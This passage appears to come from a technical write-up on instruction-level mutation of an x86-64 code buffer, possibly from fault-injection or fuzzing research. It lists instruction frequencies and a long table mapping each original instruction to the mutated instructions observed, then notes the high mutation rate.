add eax, dword ptr [rax]: 74
sbb al, byte ptr [rax]: 58
xor byte ptr [rax], al: 47
ret 0x8d48: 46
xor al, byte ptr [rax]: 36
cmp edx, 0: 34

Diverse mutations:
cmp ecx, 0 -> {'int1', 'sar ecx, 0', 'sar ecx, 1'}
adc byte ptr [rax], al -> {'sbb byte ptr [rax], al', 'xor byte ptr [rax], al'}
adc eax, dword ptr [rax] -> {'xor eax, dword ptr [rax]', 'add eax, dword ptr [rax]'}
mov eax, dword ptr [rax] -> {'cmp byte ptr [rax], al', 'xor byte ptr [rax], al'}
add ecx, eax -> {'int1', 'stc'}
and al, dil -> {'jo 0x10a33b40c', 'pop rax', 'jo 0x10a33b60c', 'push rax', 'jo 0x10a33ba7f'}
cmp ecx, esi -> {'sal ecx, 1', 'stc', 'fyl2x'}
sbb al, byte ptr [rax] -> {'xor al, byte ptr [rax]', 'add al, byte ptr [rax]', 'or al, byte ptr [rax]'}
add ecx, 8 -> {'int1', 'rol ecx, 1'}
or byte ptr [rax - 0x75], cl -> {'xor byte ptr [rax - 0x45], cl', 'cmp byte ptr [rax - 0x4d], cl', 'ror byte ptr [rax - 0x75], 0xb3', 'ror dword ptr [rax - 0x75], 0xb3', 'xor byte ptr [rax - 0x75], cl', 'cmp byte ptr [rax - 0x45], cl', 'xor byte ptr [rax - 0x4d], cl'}
cmp dword ptr [rax], eax -> {'xor dword ptr [rax], eax', 'adc dword ptr [rax], eax'}
mov ecx, eax -> {'int1', 'stc'}
add ecx, 0x20 -> {'rol ecx, 1', 'stc'}
mov dword ptr [rax + 8], ecx -> {'jo 0x10a33abe0', 'jo 0x10a33aba2'}
mov dword ptr [rax + 0x10], ecx -> {'jo 0x10a33abee', 'jo 0x10a33abad'}
mov ecx, dword ptr [rbx + 0x3160] -> {'mov ebx, 0x31608b', 'mov bl, 0x8b'}
mov eax, dword ptr [rbx + 0x2fe8] -> {'mov bl, 0x83', 'xchg ebx, eax'}
mov eax, dword ptr [rbx + 0x3148] -> {'mov ebx, 0x314883', 'mov bl, 0x83'}
mov edx, eax -> {'mov bl, 0xd0', 'cli', 'bnd ret 0xc148'}
mov eax, dword ptr [rbx + 0x3140] -> {'mov ebx, 0x314083', 'mov bl, 0x83'}
mov eax, dword ptr [rbx + 0x3118] -> {'mov ebx, 0x311883', 'mov bl, 0x83'}
mov edx, dword ptr [rbx + 0x2eb0] -> {'adc dword ptr [rbx + 0x2eb0], 0x48', 'mov bl, 0x93'}
mov esi, dword ptr [rbx + 0x2eb8] -> {'xor dword ptr [rbx + 0x2eb8], 0x48', 'mov ebx, 0x2eb8b3'}
mov ecx, dword ptr [rbx + 0x3110] -> {'mov ebx, 0x31108b', 'mov bl, 0x8b'}
and dword ptr [rsi + rbp], 0 -> {'mov bl, 0x64', 'mov ebx, 0x2e64'}
clc -> {'lock add byte ptr cs:[rax], al', 'lock add byte ptr [rdi], cl', 'shr byte ptr [rsi], 1', 'ror byte ptr [rcx + 0x3d8d48d0], 0xb8', 'lock xor dword ptr [rax], edi', 'enter 0x2b, 0', 'ror byte ptr [rax - 0x73], 0x3d', 'shr al, 0xb5', 'loopne 0x10a35f8b7', 'shr al, 0xc8', 'sti', 'ror byte ptr [rcx + 0x3d8d48c0], 0x62', 'enter 0x2d, 0', 'ror byte ptr [rcx + 0x3d8d48c0], 0xaf', 'fmul dword ptr [rcx + 0x3d8d48c0]', 'lock xor byte ptr [rax], al', 'enter 0x2f, 0', 'fsubr dword ptr [rsi]'}
ror dword ptr [rax - 0x75], 0x83 -> {'ror byte ptr [rax - 0x75], 0x83', 'ror byte ptr [rax - 0x4d], 0x83'}
mov edi, dword ptr [rbx + 0x31c0] -> {'mov bl, 0xbb', 'cmp dword ptr [rbx + 0x31c0], -0x18', 'xchg ebx, eax'}
and dword ptr [rbx + 0x2e], 0 -> {'mov bl, 0x63', 'mov esp, dword ptr [rbx + 0x2e]'}
ror dword ptr [rax - 0x77], 0x8b -> {'ror byte ptr [rax - 0x77], 0x8b', 'ror byte ptr [rax - 0x4d], 0x8b', 'fimul word ptr [rax - 0x77]'}
mov ebx, eax -> {'mov bl, 0xd8', 'mov ebx, 0x31d8'}
mov ecx, dword ptr [rdi + 0x2e] -> {'mov bl, 0x4f', 'mov ebx, 0x2e4f'}
mov ecx, edx -> {'int1', 'stc'}
mov ebp, dword ptr [rdi] -> {'mov bl, 0x2f', 'xchg ebx, eax'}
sub dword ptr [rax], 0x2e -> {'mov ebp, dword ptr [rax]', 'mov bl, 0x28'}
mov edx, dword ptr [rbx + 0x31d8] -> {'mov ebx, 0x31d893', 'mov bl, 0x93'}
mov eax, dword ptr [rbx + 0x2e18] -> {'mov ebx, 0x2e1883', 'mov bl, 0x83'}
add ecx, 3 -> {'int1', 'stc'}
mov ebp, edi -> {'mov bl, 0xef', 'mov ebx, 0x2def'}
add ecx, 4 -> {'int1', 'stc'}
mov edi, 0x89000031 -> {'lahf', 'mov bh, 0x31'}
add ecx, 5 -> {'int1', 'stc'}
add ecx, 6 -> {'int1', 'stc'}
xchg ebx, eax -> {'mov ebx, 0x31d8', 'mov ebx, 0x2cf6', 'mov bl, 0x2f', 'mov bl, 0xbe', 'mov bl, 0x17', 'mov ebx, eax', 'mov bl, 0xd8', 'add dword ptr [rax + 0x3100002f], -0x3e', 'mov ebx, 0x2d8f'}
mov eax, dword ptr [rbx + 0x2d78] -> {'mov bl, 0x83', 'mov ebx, 0x2d7883'}
mov ebp, dword ptr [rdi + 0x2d] -> {'mov ebx, 0x2d6f', 'mov bl, 0x6f'}
add byte ptr [rax], al -> {'or byte ptr [rax], al', 'xor byte ptr [rax], al', 'sbb byte ptr [rax], al', 'rol byte ptr [rax], 0', 'cmp byte ptr [rax], al', 'adc byte ptr [rax], al'}
ret 0x8d48 -> {'loopne 0x10a354ab0', 'ret', 'ror byte ptr [rax - 0x73], 0x3d', 'lea rdi, [rip + 0x4a631]', 'ror byte ptr [rax - 0x73], cl', 'enter -0x72b8, 0x3d', 'retf', 'fmul qword ptr [rax - 0x73]', 'loopne 0x10a33e331'}
mov eax, dword ptr [rbx + 0x2cb0] -> {'mov ebx, 0x2cb083', 'mov bl, 0x83'}
mov ecx, dword ptr [rdi + 0x4800002c] -> {'mov bl, 0x8f', 'mov ebx, 0x2c8f'}
mov eax, dword ptr [rbx + 0x2c98] -> {'mov ebx, 0x2c9883', 'mov bl, 0x83', 'xchg ebx, eax'}
mov esi, 0x89000031 -> {'xchg byte ptr [rcx], dh', 'xchg esi, eax'}
mov ecx, dword ptr [rdi + 0x2c] -> {'mov ebx, 0x2c4f', 'mov bl, 0x4f'}
mov eax, dword ptr [rbx + 0x2c38] -> {'mov ebx, 0x2c3883', 'mov bl, 0x83'}
sub dword ptr [rax], 0x2c -> {'mov ebp, dword ptr [rax]', 'mov bl, 0x28'}
mov eax, edx -> {'enter 0x48d0, -0x10', 'clc', 'rcl al, 0x48'}
or eax, 0x2b -> {'mov bl, 0xc8', 'mov ecx, eax'}
adc dword ptr [rbx + rbp], 0 -> {'mov edx, dword ptr [rbx + rbp]', 'mov bl, 0x14'}
mov esi, esi -> {'mov ebx, 0x2cf6', 'mov bl, 0xf6', 'xchg ebx, eax'}
mov eax, dword ptr [rbx + 0x2ae0] -> {'mov ebx, 0x2ae083', 'mov bl, 0x83'}
mov eax, dword ptr [rbx + 0x2ab8] -> {'mov bl, 0x83', 'mov ebx, 0x2ab883'}
mov eax, dword ptr [rbx + 0x2a38] -> {'mov bl, 0x83', 'mov ebx, 0x2a3883'}
or cl, ch -> {'shr cl, 0x80', 'shr cl, cl', 'shr cl, 0x30', 'shr cl, 0xad', 'shr cl, 2', 'shr cl, 0x88', 'shr cl, 0x7b', 'shr cl, 0', 'shr ecx, 0xee'}
ror byte ptr [rcx + 0x3d8d48c2], 0x2f -> {'fmul dword ptr [rcx + 0x3d8d48c0]', 'in eax, 0x89'}
xor byte ptr [rax], al -> {'sbb byte ptr [rax], al', 'jo 0x10a33ab77', 'push rax', 'jo 0x10a33ab66', 'cmp byte ptr [rax], al', 'or byte ptr [rax], al', 'adc byte ptr [rax], al'}
xor eax, dword ptr [rax] -> {'add eax, dword ptr [rax]', 'adc eax, dword ptr [rax]'}
push rax -> {'js 0x10a33c19a', 'jo 0x10a33bd9b', 'jo 0x10a339eb2', 'js 0x10a33b505', 'js 0x10a33ce67', 'jo 0x10a33c16c', 'js 0x10a33c0d7', 'jo 0x10a33b0bf', 'jo 0x10a33c750', 'jo 0x10a33c1bb', 'js 0x10a33bf40', 'jo 0x10a33ab09', 'pop rax', 'jo 0x10a33b313', 'jo 0x10a33bfa7', 'jo 0x10a33c88f', 'jo 0x10a33abac', 'sub al, 0', 'jo 0x10a33ce39', 'add byte ptr cs:[rax], al'}
add al, byte ptr [rax] -> {'xor al, byte ptr [rax]', 'sbb al, byte ptr [rax]'}
xor byte ptr [rax - 0x75], cl -> {'cmp byte ptr [rax - 0x75], cl', 'or byte ptr [rax - 0x75], cl'}
add byte ptr [rax], 0 -> {'mov byte ptr [rax], al', 'mov al, 0'}
rol byte ptr [rbp - 8], 0xc0 -> {'rol dword ptr [rbp - 8], 1', 'rol byte ptr [rbp - 8], 1'}
xor dword ptr [rax], eax -> {'cmp dword ptr [rax], eax', 'jo 0x10a33b6d3', 'jo 0x10a33b6c8', 'jo 0x10a33b24d', 'jo 0x10a33b286', 'cmp byte ptr [rax], al'}
pop rax -> {'jo 0x10a33c0e5', 'jo 0x10a33bb63', 'sub rax, -0x6b80000', 'js 0x10a33ceac', 'jo 0x10a33aacc', 'jo 0x10a33b4b5', 'js 0x10a33c33e', 'sub al, 0', 'jo 0x10a33cf4c', 'jo 0x10a33c0f5'}
cmp byte ptr [rax], dh -> {'or byte ptr [rax], dh', 'xor byte ptr [rax], dh'}
or byte ptr [rax], dh -> {'adc byte ptr [rax], dh', 'xor byte ptr [rax], dh'}
add byte ptr [rax], dh -> {'or byte ptr [rax], dh', 'xor byte ptr [rax], dh'}
xor qword ptr [rax], rax -> {'js 0x10a33b17b', 'jo 0x10a33b286', 'jo 0x10a33b074', 'jo 0x10a33af93', 'js 0x10a33b186'}
shr byte ptr [rdi], 1 -> {'clc', 'enter 0x2f, 0'}
mov bl, 0xa8 -> {'mov ebp, dword ptr [rax + 0x4800002f]', 'sub dword ptr [rax + 0x4800002f], -0x73'}
mov al, 0x2f -> {'mov eax, 0x4800002f', 'mov byte ptr [rdi], ch', 'cwde'}
nop -> {'mov eax, 0x4800002c', 'mov eax, 0x48000031', 'mov byte ptr [rsi], ch', 'mov al, 0x2e', 'mov al, 0x2f', 'mov byte ptr [rdi], ch', 'mov eax, 0x4800002d'}
mov bl, 0x83 -> {'jo 0x10a33b210', 'jo 0x10a33cc5c', 'jo 0x10a33c15c', 'js 0x10a33ce30', 'jo 0x10a33b652', 'js 0x10a33cc5c', 'jo 0x10a33ce30'}
mov byte ptr [rdi], ch -> {'nop', 'cwde', 'mov al, 0x2f'}
xor byte ptr [rcx], dh -> {'cmp byte ptr [rcx], dh', 'or byte ptr [rcx], dh', 'adc byte ptr [rcx], dh'}
mov bl, 0x38 -> {'mov edi, dword ptr [rax]', 'cmp dword ptr [rax], 0x2d'}
adc byte ptr [rdi], ch -> {'cmp byte ptr [rdi], ch', 'xor byte ptr [rdi], ch', 'or byte ptr [rdi], ch'}
xor dword ptr [rbx + 0x2f08], 0x48 -> {'mov esi, dword ptr [rbx + 0x2f08]', 'xchg ebx, eax'}
or byte ptr [rdi], ch -> {'adc byte ptr [rdi], ch', 'xor byte ptr [rdi], ch'}
mov esi, dword ptr [rbx + 0x2ef8] -> {'xchg ebx, eax', 'xor dword ptr [rbx + 0x2ef8], 0x48'}
lock add byte ptr cs:[rax], al -> {'clc', 'shr byte ptr [rsi], 1', 'fsubr dword ptr [rsi]', 'enter 0x2e, 0'}
fsubr dword ptr [rsi] -> {'lock add byte ptr cs:[rax], al', 'enter 0x2e, 0'}
mov eax, 0x4800002e -> {'cwde', 'mov al, 0x2e'}
enter 0x2e, 0 -> {'lock add byte ptr cs:[rax], al', 'shr byte ptr [rsi], 1'}
adc byte ptr [rcx], dh -> {'cmp byte ptr [rcx], dh', 'or byte ptr [rcx], dh', 'xor byte ptr [rcx], dh'}
cwde -> {'mov eax, 0x4800002c', 'mov byte ptr [rsi], ch', 'mov al, 0x2e', 'mov byte ptr [rip - 0x3eb80000], ch', 'mov al, 0x2d', 'mov byte ptr [rax + rax], ch', 'mov byte ptr [rip - 0x7cb80000], ch', 'mov byte ptr [rdi], ch', 'mov eax, 0x4800002d'}
mov byte ptr [rsi], ch -> {'nop', 'mov eax, 0x4800002e', 'mov al, 0x2e'}
ror dword ptr [rax - 0x73], cl -> {'ror byte ptr [rax - 0x73], 1', 'stc', 'ror byte ptr [rax - 0x73], 0x3d'}
mov bl, 0x64 -> {'mov ebx, 0x2e64', 'and dword ptr [rsi + rbp], 0'}
mov bl, 0xfc -> {'mov ebx, 0x30fc', 'mov edi, esp'}
mov bl, 0xbf -> {'mov ebx, 0x31bf', 'mov edi, dword ptr [rdi + 0x48000031]'}
mov bl, 0xbe -> {'mov edi, dword ptr [rsi + 0x48000031]', 'xchg ebx, eax', 'mov ebx, 0x31be'}
mov bl, 0xbd -> {'mov edi, dword ptr [rbp - 0x16ffffcf]', 'mov ebx, 0x31bd'}
mov esp, dword ptr [rbx + 0x2e] -> {'mov ebx, 0x2e63', 'and dword ptr [rbx + 0x2e], 0'}
mov bl, 0xd8 -> {'mov ebx, 0x31d8', 'sbb eax, 0x2c'}
mov bl, 0x4f -> {'mov ebx, 0x2c4f', 'mov ecx, dword ptr [rdi + 0x2e]', 'mov ecx, dword ptr [rdi + 0x2c]', 'mov ebx, 0x2e4f'}
cmp byte ptr [rsi], ch -> {'or byte ptr [rsi], ch', 'xor byte ptr [rsi], ch'}
mov bl, 0x8b -> {'jo 0x10a33cc6a', 'jo 0x10a33ce3e', 'jo 0x10a33c33e', 'jo 0x10a33c16a'}
add byte ptr cs:[rax], al -> {'js 0x10a33c19a', 'jo 0x10a33c1e8', 'js 0x10a33c16c', 'push rax', 'jo 0x10a33be34', 'jo 0x10a33bdd1', 'jo 0x10a33be6a'}
xor al, byte ptr [rax] -> {'add al, byte ptr [rax]', 'sbb al, byte ptr [rax]', 'or al, byte ptr [rax]'}
mov bl, 0x2f -> {'mov ebx, 0x2c2f', 'mov ebx, 0x2e2f', 'mov ebp, dword ptr [rdi]'}
mov bl, 0x28 -> {'sub dword ptr [rax], 0x2c', 'sub dword ptr [rax], 0x2e'}
mov bh, 0x31 -> {'lahf', 'xchg dword ptr [rcx], esi', 'xchg edi, eax'}
mov bl, 0xf -> {'mov ecx, dword ptr [rdi]', 'or dword ptr [rdi], 0x2e', 'mov ebx, 0x2e0f'}
sbb byte ptr [rsi], ch -> {'or byte ptr [rsi], ch', 'xor byte ptr [rsi], ch'}
mov bl, 0xe -> {'mov ebx, 0x2c0e', 'mov ebx, 0x2e0e'}
xor byte ptr [rax - 0x4d], cl -> {'or byte ptr [rax - 0x4d], cl', 'cmp byte ptr [rax - 0x4d], cl'}
xor byte ptr [rax + 0x2defb3], cl -> {'cmp byte ptr [rax + 0x2defbb], cl', 'or byte ptr [rax + 0x2def8b], cl'}
mov bl, 0xef -> {'mov ebx, 0x2bef', 'mov ebx, 0x2def', 'mov ebp, edi'}
mov eax, 0x4800002d -> {'mov al, 0x2d', 'mov byte ptr [rip - 0x7cb80000], ch', 'mov byte ptr [rip - 0xeb80000], ch'}
mov bl, 0xae -> {'mov ebp, dword ptr [rsi + 0x3c00002d]', 'mov ebx, 0x2dae'}
mov ebx, 0x2d8f -> {'mov ecx, dword ptr [rdi + 0x3c00002d]', 'mov ecx, dword ptr [rdi + 0x4800002d]', 'mov bl, 0x8f'}
mov bl, 0x8f -> {'mov ebx, 0x2c8f', 'xchg ebx, eax', 'mov ecx, dword ptr [rdi + 0x4800002c]', 'mov ecx, dword ptr [rdi + 0x3c00002c]', 'mov ebx, 0x2d8f'}
xor byte ptr [rax + 0x2d6fb3], cl -> {'or byte ptr [rax + 0x2d6f8b], cl', 'cmp byte ptr [rax + 0x2d6fbb], cl'}
mov bl, 0x6f -> {'mov ebx, 0x2d6f', 'mov ebp, dword ptr [rdi + 0x2c]', 'sub dword ptr [rdi + 0x2c], 0', 'mov ebp, dword ptr [rdi + 0x2d]', 'mov ebx, 0x2c6f'}
mov ebx, 0x2d6f -> {'mov ebp, dword ptr [rdi + 0x2d]', 'mov bl, 0x6f'}
mov bl, 0x37 -> {'mov ebx, 0x2d37', 'mov esi, dword ptr [rdi]'}
xor edi, 0x2c -> {'xchg ebx, eax', 'mov esi, edi'}
mov bl, 0xf7 -> {'xor edi, 0x2c', 'mov ebx, 0x2cf7'}
mov bl, 0xd0 -> {'mov edx, eax', 'adc eax, 0x2c'}
ror byte ptr [rax - 0x73], 0x3d -> {'ret 0x8d48', 'lea rdi, [rip + 0x5fd6f]', 'in eax, 0x48', 'loope 0x10a3483f1', 'loope 0x10a350044', 'clc', 'lea rdi, [rip + 0x57240]', 'ret', 'int1', 'retf 0x8d48', 'test dword ptr [rax - 0x73], 0x4a34c3d', 'in al, 0x48', 'call 0xdc71e103', 'loopne 0x10a34ba26', 'jrcxz 0x10a341e6b', 'cli', 'call 0xee747211', 'sti', 'stc', 'fimul dword ptr [rax - 0x73]', 'ror dword ptr [rax - 0x73], 0x3d', 'test byte ptr [rax - 0x73], 0x3d', 'fmul dword ptr [rax - 0x73]', 'ror dword ptr [rax - 0x73], cl', 'cld', 'jmp 0x10a358ec1', 'jrcxz 0x10a33cdbd', 'fisttp word ptr [rax - 0x73]', 'fisttp qword ptr [rax - 0x73]', 'ror byte ptr [rax - 0x73], 1', 'loopne 0x10a351918', 'dec dword ptr [rax - 0x73]', 'leave', 'lea rdi, [rip + 0x5cd55]', 'std', 'jrcxz 0x10a346177', 'lea rdi, [rip + 0x53368]', 'loope 0x10a34bfff', 'int3', 'dec byte ptr [rax - 0x73]', 'loopne 0x10a34568e', 'loope 0x10a349d97', 'out dx, al', 'hlt', 'enter -0x72b8, 0x3d', 'in al, dx', 'fmul qword ptr [rax - 0x73]'}
mov al, 0x2c -> {'mov eax, 0x4800002c', 'nop', 'mov byte ptr [rax + rax], ch', 'mov eax, 0xc600002c'}
mov bl, 0xaf -> {'sub dword ptr [rdi + 0x4800002d], -0x4d', 'mov ebx, 0x2caf'}
cli -> {'ror byte ptr [rcx + 0x3d8d48c1], 0xe1', 'add byte ptr [rdi], cl'}
mov ebp, dword ptr [rsi + 0x2c] -> {'mov bl, 0x6e', 'mov ebx, 0x2c6e'}
xor byte ptr [rax - 0x45], cl -> {'cmp byte ptr [rax - 0x45], cl', 'or byte ptr [rax - 0x45], cl'}
sub al, 0 -> {'jo 0x10a33ceac', 'js 0x10a33cf2b', 'push rax', 'jo 0x10a33cefd', 'jo 0x10a33cf79'}
cmp byte ptr [rax + rax], ch -> {'or byte ptr [rax + rax], ch', 'xor byte ptr [rax + rax], ch'}
sbb byte ptr [rax + rax], ch -> {'cmp byte ptr [rax + rax], ch', 'or byte ptr [rax + rax], ch', 'xor byte ptr [rax + rax], ch'}
fsubr dword ptr [rbx] -> {'lock sub eax, dword ptr [rax]', 'enter 0x2b, 0'}
ror byte ptr [rcx + 0x3d8d48c0], 0xa3 -> {'ret', 'in eax, dx'}
enter -0x72b8, 0x3d -> {'clc', 'ror byte ptr [rax - 0x73], 0x3d'}
fmul qword ptr [rax - 0x73] -> {'clc', 'ror byte ptr [rax - 0x73], 0x3d'}
shr al, 0xc1 -> {'leave', 'cld'}
fmul dword ptr [rcx + 0x3d8d48c0] -> {'ror byte ptr [rcx + 0x3d8d48c0], 0x82', 'ror byte ptr [rcx + 0x3d8d48c0], 0x2f', 'ror byte ptr [rcx + 0x3d8d48c0], 0xfe', 'ror byte ptr [rcx + 0x3d8d48c0], 0x18'}
sal byte ptr [rsi + 0x325e83], 0 -> {'loop 0x10a34aff0', 'fdiv dword ptr [rsi + 0x325e83]'}
dec byte ptr [rcx + 0x3d8d48c0] -> {'ror byte ptr [rcx + 0x3d8d48c0], 0x9a', 'ror byte ptr [rcx + 0x3d8d48c0], 0x6a'}
ret 0xc089 -> {'ror byte ptr [rcx + 0x3d8d48d3], 0x44', 'ror byte ptr [rcx + 0x3d8d48c0], 0x3f', 'ror byte ptr [rcx + 0x3d8d48c0], 0x40'}
ror byte ptr [rcx + 0x3d8d48c0], 0xc0 -> {'fimul dword ptr [rcx + 0x3d8d48c0]', 'enter -0x3f77, 0x48'}
shr al, 0xab -> {'out dx, eax', 'cli'}
ror byte ptr [rax - 0x73], 1 -> {'ror byte ptr [rax - 0x73], 0x3d', 'jrcxz 0x10a35245a'}
ror dword ptr [rax - 0x73], 0x3d -> {'ret', 'ror byte ptr [rax - 0x73], 0x3d'}
sti -> {'clc', 'ror byte ptr [rax - 0x73], 0x3d', 'loope 0x10a36e753'}
in eax, dx -> {'shr al, 0xf8', 'ror byte ptr [rcx + 0x3d8d48c0], 0xa3'}
retf 0xc089 -> {'ror byte ptr [rcx + 0x3d8d48c0], 0xd7', 'jmp 0x10a35bb5e'}
in al, 0x48 -> {'ror byte ptr [rax - 0x73], 0x3d', 'test byte ptr [rax - 0x73], 0x3d'}
leave -> {'shr al, 0x50', 'ror byte ptr [rax - 0x73], 0x3d', 'test dword ptr [rax - 0x73], 0x46af73d', 'stc', 'ror byte ptr [rcx + 0x3d8d48c0], 0x62'}
ror byte ptr [rax - 0x75], 0xb3 -> {'enter -0x74b8, -0x4d', 'ror dword ptr [rax - 0x75], 0xb3', 'int 0x48', 'fimul dword ptr [rax - 0x75]'}
ret -> {'ror byte ptr [rcx + 0x3d8d48c0], 0x12', 'ror byte ptr [rcx + 0x3d8d48c0], 0xa3', 'ror byte ptr [rax - 0x73], 0x3d', 'shr al, 0xf8', 'ror byte ptr [rcx + 0x3d8d48c5], 0x34', 'ror byte ptr [rcx + 0x3d8d48c0], 0xe1', 'ror byte ptr [rcx + 0x3d8d48f7], 0x4c', 'ror byte ptr [rcx + 0x3d8d48c0], 3', 'dec dword ptr [rax - 0x73]', 'fmul dword ptr [rax - 0x73]'}
cld -> {'ror byte ptr [rax - 0x73], 0x3d', 'ror byte ptr [rcx + 0x3d8d48c0], 0xe'}
add eax, dword ptr [rax] -> {'xor eax, dword ptr [rax]', 'adc eax, dword ptr [rax]'}
sbb byte ptr [rax], al -> {'adc byte ptr [rax], al', 'xor byte ptr [rax], al'}
xor byte ptr [rax], dh -> {'adc byte ptr [rax], dh', 'cmp byte ptr [rax], dh', 'or byte ptr [rax], dh'}
jo 0x10a33ab66 -> {'js 0x10a33ab66', 'push rax'}
enter 0x2f, 0 -> {'fsubr dword ptr [rdi]', 'clc', 'shr byte ptr [rdi], 1'}
mov eax, 0x4800002f -> {'mov byte ptr [rdi], ch', 'mov al, 0x2f'}
js 0x10a33b10d -> {'jo 0x10a33b10d', 'pop rax'}
js 0x10a33b186 -> {'xor qword ptr [rax], rax', 'jo 0x10a33b186'}
add dword ptr [rax + 0x3100002f], -0x3e -> {'mov bl, 0x80', 'xchg ebx, eax'}
cmp byte ptr [rax], al -> {'or byte ptr [rax], al', 'adc byte ptr [rax], al', 'xor byte ptr [rax], al'}
xor byte ptr [rdi], ch -> {'cmp byte ptr [rdi], ch', 'or byte ptr [rdi], ch'}
cmp byte ptr [rdi], ch -> {'xor byte ptr [rdi], ch', 'sbb byte ptr [rdi], ch'}
mov al, 0x2e -> {'nop', 'mov byte ptr [rsi], ch', 'mov eax, 0x4800002e', 'mov eax, 0xe900002e'}
shr byte ptr [rsi], 1 -> {'lock add byte ptr cs:[rax], al', 'enter 0x2e, 0'}
mov al, 0x31 -> {'mov eax, 0x48000031', 'mov byte ptr [rcx], dh', 'mov eax, 0xf000031'}
xor dword ptr [rbx + 0x2e80], 0x48 -> {'mov esi, dword ptr [rbx + 0x2e80]', 'xchg ebx, eax'}
mov ebx, 0x30fc -> {'mov bl, 0xfc', 'mov edi, esp'}
mov bl, 0xf0 -> {'mov esi, eax', 'xor eax, 0x2d'}
mov bl, 0x9c -> {'mov ebx, dword ptr [rcx + rsi - 0x44b80000]', 'mov ebx, 0x319c'}
mov ebx, 0x2e63 -> {'mov bl, 0x63', 'mov esp, dword ptr [rbx + 0x2e]'}
mov ebx, 0x31d8 -> {'mov bl, 0xd8', 'mov ebx, eax'}
xor byte ptr [rsi], ch -> {'or byte ptr [rsi], ch', 'cmp byte ptr [rsi], ch', 'adc byte ptr [rsi], ch'}
int1 -> {'shr al, 1', 'ror byte ptr [rax - 0x73], 0x3d', 'ror dword ptr [rdi], 0x93', 'stc'}
cmp byte ptr [rax + 0x2e0ebb], cl -> {'or byte ptr [rax + 0x2e0e8b], cl', 'xor byte ptr [rax + 0x2e0eb3], cl'}
mov ebx, 0x2e0e -> {'mov bl, 0xe', 'mov ecx, dword ptr [rsi]'}
xchg edi, eax -> {'xchg dword ptr [rcx], esi', 'mov bh, 0x31'}
mov ebx, 0x2dae -> {'mov bl, 0xae', 'mov ebp, dword ptr [rsi + 0x4800002d]'}
mov byte ptr [rip - 0x7cb80000], ch -> {'nop', 'mov al, 0x2d', 'mov eax, 0x4800002d'}
mov al, 0x2d -> {'mov eax, 0xc600002d', 'mov eax, 0x8a00002d', 'mov byte ptr [rip - 0x3eb80000], ch', 'mov byte ptr [rip - 0xdb80000], ch', 'mov eax, 0x4800002d'}
mov byte ptr [rip - 0x3eb80000], ch -> {'nop', 'mov al, 0x2d'}
mov bl, 0x70 -> {'mov esi, dword ptr [rax + 0x2d]', 'xor dword ptr [rax + 0x2d], 0'}
or byte ptr [rax], al -> {'cmp byte ptr [rax], al', 'adc byte ptr [rax], al', 'xor byte ptr [rax], al'}
sub rax, -0x6b80000 -> {'jo 0x10a33c7c5', 'push rax'}
mov ebx, 0x2d17 -> {'mov bl, 0x17', 'xchg ebx, eax'}
mov byte ptr [rax + rax], ch -> {'nop', 'mov al, 0x2c'}
mov ebx, 0x2caf -> {'mov ebp, dword ptr [rdi + 0x4800002c]', 'mov bl, 0xaf', 'xchg ebx, eax'}
xchg byte ptr [rcx], dh -> {'mov esi, 0x9000031', 'mov esi, 0x89000031'}
jo 0x10a33ce3e -> {'mov bl, 0x8b', 'js 0x10a33ce3e'}
mov ebp, dword ptr [rax] -> {'mov bl, 0x28', 'sub dword ptr [rax], 0x2c'}
ror byte ptr [rcx + 0x3d8d48c0], 9 -> {'mov eax, eax', 'ror byte ptr [rcx + 0x3d8d48c0], 1'}
ror byte ptr [rcx + 0x3d8d48c0], 0x7f -> {'jrcxz 0x10a343b72', 'ret 0xec89'}
ror byte ptr [rax - 0x73], cl -> {'ror byte ptr [rax - 0x73], 0x3d', 'test dword ptr [rax - 0x73], 0x5ed423d'}
int3 -> {'call 0x1187232a7', 'shr cl, 0', 'shr al, 0x2c'}
fmul dword ptr [rax - 0x73] -> {'loop 0x10a347908', 'ror byte ptr [rax - 0x73], 0x3d'}
int 0x89 -> {'int1', 'cmc'}
ror byte ptr [rcx + 0x3d8d48c0], 0xe1 -> {'ret', 'cli'}
shr al, 0xca -> {'in eax, 0xe8', 'shr eax, 0xca', 'ret 0xcae8'}
ror byte ptr [rcx + 0x3d8d48c0], 1 -> {'ror byte ptr [rcx + 0x3d8d48f3], 0x6f', 'ror byte ptr [rcx + 0x3d8d48c0], 9', 'ror byte ptr [rcx + 0x3d8d48d0], 0x81'}
stc -> {'ror byte ptr [rax - 0x73], 0x3d', 'int1'}
in al, dx -> {'ror byte ptr [rax - 0x77], 0x8b', 'ror byte ptr [rcx + 0x3d8d48c0], 0x2f', 'ror byte ptr [rax - 0x73], 0x3d'}
vshufpd xmm1, xmm14, xmmword ptr [rax - 0x73], 0x3d -> {'ror byte ptr [rcx + 0x3d8d48e0], 0x1d', 'ror byte ptr [rcx + 0x3d8d48c0], 3'}
hlt -> {'ror byte ptr [rcx + 0x3d8d48c0], 7', 'ror byte ptr [rcx + 0x3d8d48c0], 0x7b'}
mov al, 0 -> {'mov byte ptr [rax], al', 'mov eax, 0'}
or al, byte ptr [rax] -> {'xor al, byte ptr [rax]', 'add al, byte ptr [rax]'}
mov ebx, 0x2e64 -> {'mov bl, 0x64', 'and dword ptr [rsi + rbp], 0'}
ror byte ptr [rax - 0x4d], 0x83 -> {'loopne 0x10a33bf54', 'int 0x48'}
mov eax, eax -> {'ror byte ptr [rcx + 0x3d8d48df], 0x27', 'ror byte ptr [rcx + 0x3d8d48c0], 0xf5'}
ror byte ptr [rcx + 0x3d8d48c0], 0x62 -> {'clc', 'cld'}
shr byte ptr [rax + rax], 1 -> {'clc', 'enter 0x2c, 0'}
ror byte ptr [rax - 0x77], 0x8b -> {'clc', 'out dx, al', 'jmp 0x10a35776f'}
ror byte ptr [rcx + 0x3d8d48c0], 0x6f -> {'call 0x977fe295', 'ror byte ptr [rcx + 0x3d8d48c0], 1'}
out dx, al -> {'ror byte ptr [rax - 0x77], 0x8b', 'ror byte ptr [rax - 0x73], 0x3d'}
dec dword ptr [rax - 0x73] -> {'leave', 'ror dword ptr [rax - 0x73], 0x3d'}
ror byte ptr [rcx + 0x3d8d48c0], 0 -> {'xlatb', 'loopne 0x10a354931'}
fisttp qword ptr [rax - 0x73] -> {'out 0x48, al', 'jrcxz 0x10a35dd98'}
xlatb -> {'iretd', 'ror byte ptr [rcx + 0x3d8d48c0], 0'}
mov eax, 0xf000031 -> {'mov al, 0x31', 'mov byte ptr [rcx], dh'}


....

From this output, we can see a high mutation rate churning through every single instruction in the buffer. We can also spot which mutations show up the most.

